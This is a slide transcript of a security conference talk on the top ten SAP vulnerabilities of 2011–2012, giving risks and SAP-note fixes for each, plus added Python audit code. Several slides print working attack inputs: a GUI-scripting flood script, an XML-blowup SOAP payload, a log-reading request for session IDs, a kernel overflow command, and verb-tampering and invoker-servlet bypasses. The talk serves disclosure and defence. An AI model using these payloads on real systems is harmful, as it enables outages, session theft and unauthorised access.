EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
2014 09-04-pj
2014 09-04-pj2014 09-04-pj
2014 09-04-pj
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
Attacks on SAP Mobile
Attacks on SAP MobileAttacks on SAP Mobile
Attacks on SAP Mobile
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2Owasp advanced mobile-application-code-review-techniques-v0.2
Owasp advanced mobile-application-code-review-techniques-v0.2
 
Managing the SSL Process
Managing the SSL ProcessManaging the SSL Process
Managing the SSL Process
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 

More from ERPScan

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applicationsERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP securityERPScan
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibilityERPScan
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)ERPScan
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)ERPScan
 

More from ERPScan (8)

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 

SAP (in)security: New and best (slide transcript; the same deck is also published by Positive Hack Days)

• 7. Talks about SAP security
  Chart: number of talks about SAP security per year, 2006 to 2012 (y-axis 0 to 35).
  Most popular venues:
  •  BlackHat
  •  HITB
  •  Troopers
  •  RSA
  •  Source
  •  DeepSec
  •  etc.
• 8. SAP Security notes
  Chart: number of SAP Security notes per year, 2001 to 2012 (y-axis 0 to 900).
  By April 26, 2012, a total of 2026 notes.
• 9. SAP vulnerabilities by type
  Chart (y-axis 0 to 350), stats from 4Q 2009, 1Q 2010 and 1Q 2012:
  1 - Directory Traversal
  2 - XSS/Unauthorised modification of
  3 - Missing Auth check
  4 - Information Disclosure
  5 - Unauthorized usage of application
  6 - Hard-coded credentials
  7 - Code injection vulnerability
  8 - Verb tampering
  9 - Remote Code Execution
  10 - Denial of service
  11 - BOF
  12 - SQL Inj
• 10. Top problems by OWASP-EAS (implementation issues)
  •  EASAI-1 Lack of patch management
  •  EASAI-2 Default passwords for application access
  •  EASAI-3 SOD conflicts
  •  EASAI-4 Unnecessary enabled application features
  •  EASAI-5 Open remote management interfaces
  •  EASAI-6 Lack of password lockout/complexity checks
  •  EASAI-7 Insecure options
  •  EASAI-8 Unencrypted communications
  •  EASAI-9 Insecure trust relations
  •  EASAI-10 Guest access
• 11. Top problems by BIZEC
  •  BIZEC TEC-01: Vulnerable Software in Use
  •  BIZEC TEC-02: Standard Users with Default Passwords
  •  BIZEC TEC-03: Unsecured SAP Gateway
  •  BIZEC TEC-04: Unsecured SAP/Oracle Authentication
  •  BIZEC TEC-05: Insecure RFC Interfaces
  •  BIZEC TEC-06: Insufficient Security Audit Logging
  •  BIZEC TEC-07: Unsecured SAP Message Server
  •  BIZEC TEC-08: Dangerous SAP Web Applications
  •  BIZEC TEC-09: Unprotected Access to Administration Services
  •  BIZEC TEC-10: Insecure Network Environment
  •  BIZEC TEC-11: Unencrypted Communications
• 12. Business risks
  Espionage
  •  Stealing financial information
  •  Stealing corporate secrets
  •  Stealing supplier and customer lists
  •  Stealing HR data
  Sabotage
  •  Denial of service
  •  Modification of financial reports
  •  Access to the technology network (SCADA) through trust relations
  Fraud
  •  False transactions
  •  Modification of master data
  •  etc.
• 13. SAP on the Internet
  MYTH: SAP systems can only be attacked by insiders.
  •  We have collected data about SAP systems exposed on the Internet
  •  Various stats by country, application and version
  •  Information from Google, Shodan and Nmap scans
• 14. SAP on the Internet (chart slide)
• 15. SAP on the Internet
  About 5000 systems found, including Dispatcher, Message Server, SAPHostControl and web services.
• 16. Top 10 vulnerabilities 2011-2012
  1.  Authentication bypass via verb tampering
  2.  Authentication bypass via the Invoker servlet
  3.  Buffer overflow in the ABAP kernel
  4.  Code execution via TH_GREP
  5.  MMC: read JSESSIONID
  6.  Remote port scan
  7.  Weak encryption in SAP GUI
  8.  BAPI XSS/SMB relay
  9.  XML blowup DoS
  10. GUI scripting DoS
• 17. 10 - GUI Scripting DoS: Description (New. Author: Dmitry Chastukhin, ERPScan)
  •  SAP users can run scripts which automate their user functions
  •  A script has the same rights in SAP as the user who launched it
  •  The security warning shown to the user when a script attaches can be turned off in the registry
  •  Almost any user can send SAP system messages (transaction SM02)
  •  It is therefore possible to run a DoS attack against any user with a simple script
• 18. 10 - GUI Scripting: Details

```vbscript
' Attach to the running SAP GUI instance through the SAP GUI Scripting API
If Not IsObject(application) Then
   Set SapGuiAuto = GetObject("SAPGUI")
   Set application = SapGuiAuto.GetScriptingEngine
End If
If Not IsObject(connection) Then
   Set connection = application.Children(0)
End If
If Not IsObject(session) Then
   Set session = connection.Children(0)
End If
If IsObject(WScript) Then
   WScript.ConnectObject session, "on"
   WScript.ConnectObject application, "on"
End If

' Flood: open SM02 and create a system message, 1000 times
Do
   a = a + 1
   session.findById("wnd[0]").maximize
   session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
   session.findById("wnd[0]/tbar[0]/btn[0]").press
   session.findById("wnd[0]/tbar[1]/btn[34]").press
   session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
   session.findById("wnd[1]").sendVKey 4
   session.findById("wnd[2]/usr/lbl[1,3]").setFocus
   session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
   session.findById("wnd[2]").sendVKey 2
   session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
   session.findById("wnd[1]/tbar[0]/btn[0]").press
Loop Until a >= 1000
```
• 19. 10 - GUI Scripting: Other attacks
  Other attacks, such as changing bank account details in LFBK (vendor bank data), are also possible.
  The script can be delivered using:
  •  a SAP GUI ActiveX vulnerability
  •  a Teensy USB device
  •  any other method of client-side exploitation
• 20. 10 - GUI Scripting: Business risks
  Ease of exploitation - Medium
  Sabotage - High
  Espionage - No
  Fraud - No
• 21. 10 - GUI Scripting: Prevention
  •  SAP GUI Scripting Security Guide
  •  sapgui/user_scripting = FALSE
  •  Block registry modification on workstations
• 22. 9 - XML Blowup DoS: Description (New. Author: Alexey Tyurin, ERPScan)
  •  The WEBRFC interface can be used to run RFC functions over HTTP/SOAP
  •  By default any user can have access
  •  Can execute at least RFC_PING
  •  SAP NetWeaver is vulnerable to malformed XML packets
  •  It is possible to run a DoS attack against the server using a simple script
  •  It is possible over the Internet!
• 23. 9 - XML Blowup DoS: Details

```xml
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body>
    <!-- thousands of bogus attributes on the RFC_PING element -->
    <m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions"
                a1="" a2="" ... a10000="">
    </m:RFC_PING>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
• 24. 9 - XML Blowup DoS: Business risks
  Ease of exploitation - Medium
  Espionage - No
  Fraud - No
  Sabotage - Critical
• 25. 9 - XML Blowup DoS: Prevention
  •  Disable WEBRFC
  •  Prevent unauthorized access to WEBRFC using the S_ICF authorization object
  •  Install SAP notes 1543318 and 1469549
• 26. 8 - BAPI script injection/hash stealing: Description (Author: Dmitry Chastukhin, ERPScan)
  •  The SAP BAPI transaction fails to properly sanitize input
  •  It is possible to inject JavaScript code or a link to a fake SMB server
  •  SAP GUI clients run on Windows, so their Windows credentials (NTLM hashes) are sent to the attacker's host
• 27. 8 - BAPI script injection/hash stealing: Demo (New)
• 28. 8 - BAPI script injection/hash stealing: Business risks
  Ease of exploitation - Low
  Sabotage - High
  Espionage - High
  Fraud - High
• 29. 7 - SAP GUI bad encryption: Description (New. Author: Alexey Sintsov, ERPScan)
  •  SAP FrontEnd can save encrypted passwords in shortcuts
  •  Shortcuts are stored in .sap files
  •  The password is encrypted with a byte-XOR algorithm and a "secret" key
  •  The key has the same value for every installation of SAP GUI
  •  Any stored password can be decrypted in 1 second
• 30. 7 - SAP GUI bad encryption: Demo
• 31. 7 - SAP GUI bad encryption: Business risks
  Sabotage - Medium
  Fraud - High
  Espionage - High
  Ease of exploitation - Medium
• 32. 7 - SAP GUI bad encryption: Prevention
  •  Disable password storage in SAP GUI shortcuts
• 33. 6 - Remote port scan via JSP: Description (Author: Alexander Polyakov, ERPScan)
  •  It is possible to scan the internal network from the Internet
  •  Authentication is not required
  •  The SAP NetWeaver J2EE engine is vulnerable
  The JSP takes the target host and port as parameters, so the response reveals the state of an internal port:
  /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=
• 34. 6 - Remote port scan via JSP: Demo
  Screenshots of the three distinguishable responses: port closed, HTTP port, SAP port.
• 35. 6 - Remote port scan via JSP: Business risks
  Ease of exploitation - High
  Espionage - Medium
  Fraud - No
  Sabotage - Low
• 36. 6 - Remote port scan via JSP: Prevention
  •  Install SAP notes 1548548, 1545883, 1503856, 948851
  •  Disable unnecessary applications
• 37. 5 - MMC JSESSIONID stealing: Description (New)
  •  SAP MMC: remote management of the SAP platform (through the sapstartsrv SAPControl web service)
  •  By default, many commands can be issued without authentication
  •  Exploits are implemented in Metasploit (by ChrisJohnRiley)
  •  Most of the bugs are information disclosure
  •  It is possible to find JSESSIONID values in the logs, but only if trace is ON
  •  With a stolen JSESSIONID one can be authenticated remotely as an existing user
  1) Original bug by ChrisJohnRiley
  2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)
• 38. 5 - MMC JSESSIONID stealing: Details

```xml
<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <!-- SAPControl ReadLogFile: read the J2EE user-interface log, which contains
         JSESSIONID values when tracing is switched on -->
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter></filter>
      <language></language>
      <maxentries>100</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
• 39. 5 - MMC JSESSIONID stealing: Business risks
  Espionage - Critical
  Sabotage - Medium
  Fraud - High
  Ease of exploitation - Medium
• 40. 5 - MMC JSESSIONID stealing: Prevention
  •  By default the JSESSIONID is not written to the log file
  •  Don't use TRACE_LEVEL = 3 on production systems, or delete the traces after use
  •  More information: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
• 41. 4 - Remote command execution in TH_GREP: Description
  •  RCE vulnerability in the RFC function module TH_GREP
  •  Found by Joris van de Vis
  •  SAP's patch (note 1433101) was not complete
  •  We discovered that the patch can be bypassed on Windows
  Original bug by Joris van de Vis (erp-sec); bypass by Alexey Tyurin (ERPScan)
• 42. 4 - RCE in TH_GREP: Details

```abap
elseif opsys = 'Windows NT'.
  " Windows branch: the user-supplied string is placed inside /c:"..."
  " with no escaping of embedded double quotes
  concatenate '/c:"' string '"' filename into grep_params in character mode.
else.
  " Unix/Linux branch: embedded single quotes are escaped as '"'"'
  " before the string is wrapped in single quotes
  replace all occurrences of '''' in local_string with '''"''"'''.
  concatenate '''' local_string '''' filename into grep_params
    in character mode.
endif.
```
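Why the Unix branch holds and the Windows branch does not is easiest to see by running both quoting rules over the same input. The block below is an added example, not SAP's code: it reproduces the two string-building branches in Python, splits the result the way each shell would, and shows a hardened variant. The name of the external tool (`GREP_BINARY`) and the argv-based hardening are assumptions of this example, not SAP's fix, which is in the notes cited on the prevention slide.

```python
"""Added example: model of the two TH_GREP quoting branches shown above.
Not SAP's code; GREP_BINARY and the hardened variant are assumptions."""
import shlex

GREP_BINARY = "grep"  # assumption: the external tool that receives grep_params


def build_grep_params_unix(pattern: str, filename: str) -> str:
    """Unix branch: every ' in the pattern becomes '"'"', then the pattern is
    wrapped in single quotes (mirrors the REPLACE/CONCATENATE lines)."""
    escaped = pattern.replace("'", "'\"'\"'")
    return f"'{escaped}' {filename}"


def build_grep_params_windows(pattern: str, filename: str) -> str:
    """Windows branch: the pattern is dropped inside /c:"..." verbatim."""
    return f'/c:"{pattern}" {filename}'


def unix_argv(params: str) -> list:
    """How a POSIX shell splits the Unix parameter string."""
    return shlex.split(params)


def windows_argv(params: str) -> list:
    """Simplified Windows command-line splitting: a double quote toggles
    quoting and whitespace outside quotes separates arguments."""
    args, cur, quoted = [], "", False
    for ch in params:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        args.append(cur)
    return args


def cmd_operator_outside_quotes(params: str) -> bool:
    """True if a cmd.exe operator (& | < > ^) ends up outside double quotes,
    i.e. the shell would run something other than the grep tool."""
    quoted = False
    for ch in params:
        if ch == '"':
            quoted = not quoted
        elif ch in '&|<>^' and not quoted:
            return True
    return False


def hardened_windows_argv(pattern: str, filename: str) -> list:
    """Hardened variant (assumption): reject shell metacharacters and pass
    the pattern as its own argv element so no shell ever re-parses it."""
    if any(ch in pattern for ch in '"&|<>^%'):
        raise ValueError("pattern contains characters that are not allowed")
    return [GREP_BINARY, f"/c:{pattern}", filename]
```

A pattern containing a single quote and a `;` stays one argument on Unix, while a pattern containing a double quote on Windows closes the `/c:"..."` argument early and everything after it is parsed by cmd.exe as further arguments and operators.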
• 43. 4 - RCE in TH_GREP: Demo #1
• 44. 4 - RCE in TH_GREP: More details
  4 ways to reach the vulnerable function:
  •  Using transaction SE37
  •  Using transaction SM51 (thanks to Felix Granados)
  •  Using a remote RFC call to TH_GREP
  •  Using a SOAP RFC call to TH_GREP via the web interface
• 45. 4 - RCE in TH_GREP: Demo #2
• 46. 4 - RCE in TH_GREP: Business risks
  Sabotage - Medium
  Fraud - High
  Espionage - High
  Ease of exploitation - Medium
• 47. 4 - RCE in TH_GREP: Prevention
  •  Install SAP notes 1580017 and 1433101
  •  Restrict access to critical transactions and RFC functions
  •  Check the ABAP code of your Z-transactions for similar vulnerabilities
• 48. 3 - ABAP Kernel BOF: Description (Author: Andreas Wiegenstein, Virtual Forge)
  •  Presented by Andreas Wiegenstein at BlackHat EU 2011
  •  Buffer overflow in the SAP kernel function C_SAPGPARAM
  •  Triggered when the NAME field is longer than 108 characters
  •  Can be exploited by calling any function module which uses C_SAPGPARAM
  •  Example of such a function module: RSPO_R_SAPGPARAM
• 49. 3 - ABAP Kernel BOF: Details

```shell
startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 -u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4
```

  The server closes the connection and the client sees:
  RFC Call/Exception: SYSTEM_FAILURE
  Group    Error group 104
  Key      RFC_ERROR_SYSTEM_FAILURE
  Message  connection closed without message (CM_NO_DATA_RECEIVED)
• 50. 3 - ABAP Kernel BOF: Business risks
  Ease of exploitation - Medium
  Espionage - Critical
  Fraud - Critical
  Sabotage - Critical
• 51. 3 - ABAP Kernel BOF: Prevention
  •  Install SAP notes:
     - 1493516 - Correcting buffer overflow in ABAP system call
     - 1487330 - Potential remote code execution in SAP Kernel
  •  Restrict access to critical transactions and RFC functions
  •  Check the ABAP code of your Z-transactions for critical calls
• 52. 2 - Invoker Servlet: Description
  •  A quick way to call servlets directly by their class name
  •  Published by SAP in its security guides
  •  It is possible to call any servlet of the application, even one not declared in WEB.XML
  •  Can be used for authentication bypass
• 53. 2 - Invoker Servlet: Details (Author: Dmitry Chastukhin, ERPScan)

```xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
```

  What if we call /servlet/com.sap.admin.Critical.Action? That URL is not matched by /admin/*, so the constraint does not apply.
• 54. 2 - Invoker servlet: Business risks
  Ease of use - Very easy!
  Espionage - High
  Sabotage - High
  Fraud - High
• 55. 2 - Invoker servlet: Prevention
  •  Install the latest patches (SAP notes 1467771, 1445998)
  •  The "EnableInvokerServletGlobally" property of the servlet_jsp service must be "false"
  If you can't install the patches for some reason, check all WEB.XML files, either with the ERPScan web.xml scanner or manually.
• 56. 1 - Verb Tampering
• 57. 1st place - Verb Tampering (Author: Alexander Polyakov, ERPScan)

```xml
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
```

  What if we use HEAD instead of GET? Only the listed method is protected.
• 58. 1st place - Verb tampering: Details
  Remotely, without authentication!
  •  CTC - the "secret" interface for managing the J2EE engine
  •  Can be accessed remotely
  •  Can run user management and administration actions:
     - Add users
     - Add users to groups
     - Run OS commands
     - Start/stop the J2EE engine
• 59. 1 - Verb tampering: Demo
• 60. 1 - Verb tampering: More details
  If patched, it can still be bypassed through the Invoker servlet!
• 61. 1 - Verb tampering: Business risks
  Espionage - Critical
  Sabotage - Critical
  Fraud - Critical
  Ease of use - Very easy!
• 62. 1st place - Verb tampering: Prevention
  •  Install SAP notes 1503579 and 1616259
  •  Install the other SAP notes about verb tampering (about 18)
  •  Scan applications with the ERPScan WEB.XML check tool or manually
  •  Secure WEB.XML by deleting all <http-method> elements, so the constraint covers every verb
  •  Disable the applications that are not necessary
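Both the Invoker servlet bypass (slide 53) and the verb tampering bypass (slide 57) come down to what a `<security-constraint>` does and does not cover, so one WEB.XML audit serves both. The block below is an added example, not the ERPScan WEB.XML check tool the slides mention: it decides whether a given path and verb fall under a role-requiring constraint, lists the findings a manual review would look for, and applies slide 62's advice of removing every `<http-method>`. The sample descriptor is the slides' own, with its markup typos fixed; the function names and the assumption that the invoker servlet is enabled by default are ours.

```python
"""Added example: audit a J2EE WEB.XML for verb tampering and invoker
servlet exposure. Not the ERPScan tool; sample descriptor from the slides."""
import xml.etree.ElementTree as ET

# Constructed sample: the slides' servlet plus its GET-only constraint.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>"""


def _local(tag):
    """Drop a namespace prefix so xmlns'd descriptors work as well."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    return [c.text.strip() for c in _children(elem, name) if c.text]


def _pattern_matches(pattern, path):
    """Servlet-spec url-pattern matching: prefix, extension, exact, default."""
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return pattern == path or pattern == "/"


def _collections(root):
    """Every <web-resource-collection> of a constraint that has an
    <auth-constraint>, i.e. one that actually demands a role."""
    for sc in root.iter():
        if _local(sc.tag) == "security-constraint" and _children(sc, "auth-constraint"):
            for wrc in _children(sc, "web-resource-collection"):
                yield wrc


def constraint_covers(xml_text, path, method):
    """True if a role-requiring constraint applies to this path AND verb.
    No <http-method> means all verbs; a non-empty list leaves every other
    verb (HEAD, PUT, ...) unauthenticated: the verb tampering hole."""
    root = ET.fromstring(xml_text)
    for wrc in _collections(root):
        methods = [m.upper() for m in _texts(wrc, "http-method")]
        if any(_pattern_matches(p, path) for p in _texts(wrc, "url-pattern")):
            if not methods or method.upper() in methods:
                return True
    return False


def audit_web_xml(xml_text, invoker_enabled=True):
    """Findings: verb-restricted constraints and, when the invoker servlet is
    on (assumed default here), the /servlet/<class> alias of each declared
    servlet, which no url-pattern based constraint covers."""
    root = ET.fromstring(xml_text)
    findings = []
    for wrc in _collections(root):
        methods = [m.upper() for m in _texts(wrc, "http-method")]
        if methods:
            findings.append({"type": "verb-tampering",
                             "patterns": _texts(wrc, "url-pattern"),
                             "protected_methods": methods})
    if invoker_enabled:
        for servlet in root.iter():
            if _local(servlet.tag) == "servlet":
                for cls in _texts(servlet, "servlet-class"):
                    findings.append({"type": "invoker-servlet",
                                     "servlet": _texts(servlet, "servlet-name")[0],
                                     "url": f"/servlet/{cls}"})
    return findings


def fix_verb_constraints(xml_text):
    """Slide 62's advice: delete every <http-method> so each constraint
    covers all verbs. Returns the rewritten descriptor."""
    root = ET.fromstring(xml_text)
    for wrc in _collections(root):
        for m in _children(wrc, "http-method"):
            wrc.remove(m)
    return ET.tostring(root, encoding="unicode")
```

Removing the `<http-method>` elements closes the verb hole; the `/servlet/<class>` alias is only closed by setting `EnableInvokerServletGlobally` to false, which is why the audit reports it separately.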
• 63. Conclusion
  It is possible to be protected from almost all of these kinds of issues, and we are working hard with SAP to make it secure.
  It's all in your hands:
  •  SAP Guides
  •  Regular security assessments
  •  ABAP code review
  •  Monitoring of technical security
  •  Segregation of Duties
• 64. Future work
  Many of the things we have researched cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for their cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the upcoming presentations:
  •  Just4Meeting in July (Portugal)
  •  BlackHat USA in July (Las Vegas)
• 65. Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.
• 66. Contacts
  Web: www.erpscan.com
  E-mail: info@erpscan.com, sales@erpscan.com
  Twitter: @erpscan, @sh2kerr